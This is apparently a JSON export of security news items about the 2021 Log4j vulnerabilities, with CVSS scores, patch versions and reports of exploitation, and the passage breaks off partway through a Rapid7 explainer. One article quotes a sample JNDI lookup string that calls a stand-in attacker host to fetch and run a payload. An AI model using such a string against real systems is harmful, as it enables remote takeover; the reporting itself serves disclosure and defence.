"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T05:03:39", "id": "THN:76D7572EDBE770410D6F0518DAD8B0AD", "href": "https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgNLP8yONJbG3r97wko9PpPe2QACzC9nklHfNtPdJrZ2-Zep3_4A5RuH3VU3VVsigHm4wVeChASXi-pPF2tb1KLj110Y0kKVP2D3IRRNEx50hCFfeSWEgtb1JYx5QXyehNyv5ydH9ffEHse8hcLH2MLDRbtmMlkz_dOBnTED2Qly7MUL3KGQlUWc862>)\n\nMicrosoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of [security vulnerabilities](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems.\n\n\"Exploitation attempts and testing have remained high during the last weeks of December,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in revised guidance published earlier this week. \"We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.\"\n\nPublicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), has emerged as a new attack vector for [widespread exploitation](<https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html>) by a variety of threat actors.\n\nIn the subsequent weeks, four more weaknesses in the utility have come to light \u2014 [CVE-2021-45046](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>), [CVE-2021-45105](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>), [CVE-2021-4104](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>), and [CVE-2021-44832](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) \u2014 providing opportunistic bad actors with persistent control over the compromised machines and mount an evolving array of attacks ranging from [cryptocurrency miners](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) to [ransomware](<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html>).\n\nEven as the mass scanning attempts are showing no signs of letting up, efforts are underway to evade string-matching detections by obfuscating the malicious HTTP requests orchestrated to generate a web request log using Log4j that leverages JNDI to perform a request to the attacker-controlled site.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgaISQLd_s-KbQbfGfCrOYexKT53Aj4HUmyQM8dc_d3S-50B1F8f-o8zz5QpnE2lrZ5JH_sn9V2_Qz7Cear4RyxRx35PWKEpOGwiJndccR5DK4nke5kFXDxkPOp6dO5BQEqTPyxxSXMT31uKobWxtRh-c-goH94Z5oYdhpx8oFF_Fc0WE5iojT1PY__>)\n\nIn addition, Microsoft said it observed \"rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the [Tsunami](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami>) backdoor to Linux systems.\"\n\nOn top of that, the Log4Shell vulnerability has also been put to use to drop additional remote access toolkits and reverse shells such as [Meterpreter](<https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter>), [Bladabindi](<https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat>) (aka NjRAT), and [HabitsRAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat>).\n\n\"At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments,\" MSTIC noted. \"Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, [requiring](<https://twitter.com/MsftSecIntel/status/1475627081753112579>) ongoing, sustainable vigilance.\"\n\nThe development also comes as the U.S. Federal Trade Commission (FTC) [issued](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) a warning that it \"intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T05:12:00", "type": "thn", "title": "Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-05T05:13:47", "id": "THN:933FE23273AB5250B949633A337D44E1", "href": "https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:45", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEj5U0g2_WyR8SbKST5XjqUQfiNDFBnK1P10zvn_VmGHTvYewDJ_f6Uba7GdDWj_q7hpd94W2z43r10bfWui1lC5yjhHu93_YJ6bs715HJNCdeWTWwuf_Z05KOjQsJczoeLDMRTOlaGfVvbwSX9ADqbQPWrdoXvAhoMbYRhL7kbb1cg7eKHjMhv0e-E9>)\n\nThe Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.\n\nTracked as [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n\n\"Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code,\" the ASF [said](<https://logging.apache.org/log4j/2.x/security.html>) in an advisory. \"This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\"\n\nAlthough no credits were awarded by the ASF for the issue, Checkmarx security researcher Yaniv Nizry [claimed credit](<https://twitter.com/YNizry/status/1475764153373573120>) for reporting the vulnerability to Apache on December 27.\n\n\"The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,\" Nizry [noted](<https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/>). \"Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.\"\n\nWith the latest fix, the project maintainers have addressed a total of four issues in Log4j since the [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) flaw came to light earlier this month, not to mention a fifth vulnerability affecting versions Log4j 1.2 that will not be fixed \u2014\n\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)\n * [**CVE-2021-45046**](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n * [**CVE-2021-45105**](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n * [**CVE-2021-4104**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)\n\nThe development also comes as intelligence agencies from across Australia, Canada, New Zealand, the U.K., and the U.S. [issued](<https://thehackernews.com/2021/12/cisa-fbi-and-nsa-publish-joint-advisory.html>) a joint advisory warning of mass exploitation of multiple vulnerabilities in Apache's Log4j software library by nefarious adversaries.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T04:59:00", "type": "thn", "title": "New Apache Log4j Update Released to Patch Newly Discovered Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-29T05:00:00", "id": "THN:1D10167F5D53B2791D676CF56488D5D9", "href": "https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi5u3P4_hPrWtSmhgDZPiVltBgMpBxNkK1fHd-IqQfVHIm618vLgTxNl2hfeK4i3CfSGH0ORwL654UZMADrYgPjOZNW5ZNfjXogHkEJbsrZLyS0OLrDd1d3pO8QWA10tcCz30cQJ0MCOOaPudPa_bQVOnMNzhyJ0c0HhkO94hlQbY5Bax2lHFUj_2SW>)\n\nWeb infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a [second bug](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.\n\nThe new vulnerability, assigned the identifier [CVE-2021-45046](<https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/>), makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug \u2014 CVE-2021-44228 aka Log4Shell \u2014 was \"incomplete in certain non-default configurations.\" The issue has since been addressed in Log4j version 2.16.0.\n\n\"This vulnerability is actively being exploited and anyone using Log4j should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0,\" Cloudflare's Andre Bluehs and Gabriel Gabor [said](<https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/>).\n\nEven more troublingly, researchers at security firm Praetorian warned of a [third separate security weakness](<https://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data/>) in Log4j version 2.15.0 that can \"allow for exfiltration of sensitive data in certain circumstances.\" Additional technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0.\n\n\"2.16 disables JNDI lookups by default and \u2014 as a result \u2014 is the safest version of Log4j2 that we're aware of,\" Anthony Weems, principal security engineer at Praetorian, told The Hacker News. When reached for a response, the Apache Logging Services Project Management Committee (PMC) confirmed that \"We have been in contact with the engineer from Praetorian to fully understand the nature and scope of the problem.\"\n\nThe latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of [Hafnium](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) and [Phosphorus](<https://thehackernews.com/2021/07/iranian-hackers-posing-as-scholars.html>), have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over [1.8 million attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) to exploit the Log4j vulnerability have been recorded so far.\n\nMicrosoft Threat Intelligence Center (MSTIC) [said](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) it also observed access brokers leveraging the Log4Shell flaw to gain initial access to target networks that were then sold to other ransomware affiliates. In addition, dozens of malware families that run the gamut from cryptocurrency coin miners and remote access trojans to botnets and web shells have been identified taking advantage of this shortcoming to date.\n\nWhile it's common for threat actors to make efforts to exploit newly disclosed vulnerabilities before they're remediated, the Log4j flaw underscores the risks arising from software supply chains when a key piece of software is used within a broad range of products across several vendors and deployed by their customers around the world.\n\n\"This cross-cutting vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, transportation, and more,\" industrial cybersecurity firm Dragos [noted](<https://www.dragos.com/blog/industry-news/implications-of-log4j-vulnerability-for-ot-networks/>).\n\n\"As network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks,\" the company added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T06:24:00", "type": "thn", "title": "Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T05:54:33", "id": "THN:5BAE3325983F971D1108722C454FF9AB", "href": "https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEh5GtHaTHgh3Nb_v7QKaSLU1KeXKaQbBWPly6eg2ZtOxGICtbv9EpmiQmdjNHR4VMNIVtKcxHD6HrbAP366_7eDfOZmrYC88WifiIpeLTnG1mEBzu8jk3JoLEw3LKVw_jIjqTlNlRaGVKmSTOUmUCzbaKPFu2PMNGGgALR0wX1l4UiNCEC7zAhpZgV0>)\n\n**UPDATE \u2014** _The severity score of CVE-2021-45046, originally classified as a DoS bug, has since been revised from 3.7 to 9.0, to reflect the fact that an attacker could abuse the vulnerability to send a specially crafted string that leads to \"information leak and remote code execution in some environments and local code execution in all environments.\"_\n\nThe Apache Software Foundation (ASF) has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed [**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) exploit was deemed as \"incomplete in certain non-default configurations.\"\n\nThe second vulnerability \u2014 tracked as [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) \u2014 is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be abused to infiltrate and take over systems.\n\nThe incomplete patch for [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) could be abused to \"craft malicious input data using a [JNDI](<https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface>) Lookup pattern resulting in a denial-of-service (DoS) attack,\" the ASF [said](<https://logging.apache.org/log4j/2.x/security.html>) in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but [removes](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>) support for message lookups and disables JNDI by default, the component that's at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12.2 when it becomes available.\n\n\"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues,\" Ralph Goers of the ASF [explained](<https://issues.apache.org/jira/browse/LOG4J2-3208>). \"While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it.\"\n\nJNDI, short for Java Naming and Directory Interface, is a Java API that enables applications coded in the programming language to look up data and resources such as [LDAP](<https://en.wikipedia.org/wiki/LDAP>) servers. Log4Shell is resident in the Log4j library, an open-source, Java-based logging framework commonly incorporated into Apache web servers.\n\nThe issue itself occurs when the JNDI component of the LDAP connector is leveraged to inject a malicious LDAP request \u2014 something like \"${jndi:ldap://attacker_controled_website/payload_to_be_executed}\" \u2014 that, when logged on a web server running the vulnerable version of the library, enables an adversary to retrieve a payload from a remote domain and execute it locally.\n\nThe latest update arrives as fallout from the flaw has resulted in a \"true cyber pandemic,\" what with several threat actors seizing on Log4Shell in ways that lay the groundwork for [further](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) [attacks](<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html>), including deploying coin miners, remote access trojans, and ransomware on susceptible machines. The opportunistic intrusions are said to have commenced at least since December 1, although the bug became common knowledge on December 9.\n\nThe security flaw has sparked widespread alarm because it exists in a near-ubiquitously used logging framework in Java applications, presenting bad actors with an unprecedented gateway to penetrate and compromise millions of devices across the world.\n\nSpelling further trouble for organizations, the remotely exploitable flaw also impacts [hundreds](<https://github.com/NCSC-NL/log4shell>) of [major enterprise](<https://github.com/cisagov/log4j-affected-db>) products from a number of companies such as [Akamai](<https://developer.akamai.com/tools/integrations/siem/siem-cef-connector>), [Amazon](<https://aws.amazon.com/security/security-bulletins/AWS-2021-006/>), [Apache](<https://blogs.apache.org/foundation/entry/apache-log4j-cves>), [Apereo](<https://apereo.github.io/2021/12/11/log4j-vuln/>), [Atlassian](<https://confluence.atlassian.com/security/multiple-products-security-advisory-log4j-vulnerable-to-remote-code-execution-cve-2021-44228-1103069934.html>), [Broadcom](<https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793>), [Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd>), [Cloudera](<https://blog.cloudera.com/cloudera-response-to-cve-2021-44228/>), [ConnectWise](<https://www.connectwise.com/company/trust/advisories>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2021-44228>), [Docker](<https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/>), [Fortinet](<https://www.fortiguard.com/psirt/FG-IR-21-245>), [Google](<https://cloud.google.com/log4j2-security-advisory>), [IBM](<https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-websphere-application-server-cve-2021-44228/>), [Intel](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html>), [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259>), [Microsoft](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>), [Okta](<https://sec.okta.com/articles/2021/12/log4shell>), [Oracle](<https://blogs.oracle.com/security/post/cve-2021-44228>), [Red Hat](<https://access.redhat.com/security/vulnerabilities/RHSB-2021-009#updates-for-affected-products>), [SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-44228>), [SonicWall](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), [Splunk](<https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html>), [Ubuntu](<https://ubuntu.com/security/CVE-2021-44228>), [VMware](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), [Zscaler](<https://trust.zscaler.com/posts/9581>), and [Zoho](<https://pitstop.manageengine.com/portal/en/community/topic/apache-log4j-vulnerability-cve-2021-44228-1>), posing a significant software supply chain risk.\n\n\"Unlike other major cyberattacks that involve one or a limited number of software, Log4j is basically embedded in every Java based product or web service. It is very difficult to manually remediate it,\" Israeli security company Check Point [said](<https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/>). \"This vulnerability, because of the complexity in patching it and easiness to exploit, seems that it will stay with us for years to come, unless companies and services take immediate action to prevent the attacks on their products by implementing a protection.\"\n\nIn the days after the bug was disclosed, at least [ten different groups](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) have jumped in on the exploit bandwagon and roughly 44% of corporate networks globally already have been under attack, marking a significant escalation of sorts. Furthermore, criminal gangs acting as [access brokers](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) have begun using the vulnerability to gain initial foothold into target networks and then sell the access to ransomware-as-a-service (RaaS) affiliates.\n\nThis also encompasses nation-state actors originating from China, Iran, North Korea, and Turkey, with Microsoft [noting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) that the \"activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives.\"\n\nThe large-scale weaponization of the remote code execution flaw has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add Log4Shell to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), giving federal agencies a deadline of December 24 to incorporate patches for the vulnerability and [urging vendors](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to \"immediately identify, mitigate, and patch affected products using Log4j.\"\n\nSean Gallagher, a senior threat researcher at Sophos, warned that \"adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on,\" adding \"there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability.\"\n\n\"The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere,\" Gallagher added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T05:26:00", "type": "thn", "title": "Second Log4j Vulnerability (CVE-2021-45046) Discovered \u2014 New Patch Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-18T13:56:31", "id": "THN:602D65D576B090BAC4B0C96998F8F922", "href": "https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-11T19:27:04", "description": "\n\nIf you work in security, the chances are that you have spent the last several days urgently responding to the [Log4Shell vulnerability](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) (CVE-2021-44228), investigating where you have instances of Log4j in your environment, and questioning your vendors about their response. You have likely already read up on the implications and steps that need to be taken. This blog is for everyone else who wants to understand what\u2019s going on and why the internet seems to be on fire again. And for you security professionals, we\u2019ve also included some questions on the broader implications and long term view. You know, for all that spare time you have right now.\n\n## What is Log4Shell?\n\nLog4Shell \u2014 also known as CVE-2021-44228 \u2014 is a critical vulnerability that enables remote code execution in systems using the Apache Foundation\u2019s Log4j, which is an open-source Java library that is extensively used in commercial and open-source software products and utilities. For a more in-depth technical assessment of Log4Shell check out [Rapid7\u2019s AttackerKB analysis](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis>).\n\n## What is Log4j?\n\nLog4j is one of the most common tools for sending text to be stored in log files and/or databases. It is used in millions of applications and websites in every organization all across the internet. For example, information is sent to keep track of website visitors, note when warnings or errors occur in processing, and help support teams\u2019 triage problems.\n\n#### Get answers to your Log4Shell questions from our experts\n\n[Sign up for our webinar on Thursday, December 16](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\n \n\n\n## So what\u2019s the problem?\n\nIt turns out that Log4j doesn\u2019t just log plain strings. Text strings that are formatted a certain way will be executed just like a line from a computer program. The problem is that this allows malicious actors to manipulate computers all over the internet into taking actions without the computer owners\u2019 wishes or permission. Cyberattacks can use this to steal information, force actions, or extort the computer owners or operators.\n\nThis vulnerability is what we\u2019re referring to as Log4Shell, or CVE-2021-44228. Log4j is the vulnerable technology. As this is a highly evolving situation, you can always head over to our [main live blog](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) on Log4Shell.\n\n## Is it really that big of a deal?\n\nIn a word, yes.\n\nCaitlin Kiska, an information security engineer at Cardinal Health, [put it this way](<https://twitter.com/TheGamblingBird/status/1470518451198439426>): \"Imagine there is a specific kind of bolt used in most of the cars and car parts in the world, and they just said that bolt needs to be replaced.\" Glenn Thorpe, Rapid7's Emergent Threat Response Manager added, \"\u2026 and the presence of that bolt allows anyone to just take over the car.\"\n\nThe first issue is Log4j\u2019s widespread use. This little tool is used in countless systems across the internet, which makes remediation or mitigation of this into a huge task \u2014 and makes it more likely something might get missed.\n\nThe second issue is that attackers can use it in a variety of ways, so the sky is sort of the limit for them.\n\nPerhaps the biggest concern of all is that it\u2019s actually pretty easy to use the vulnerability for malicious 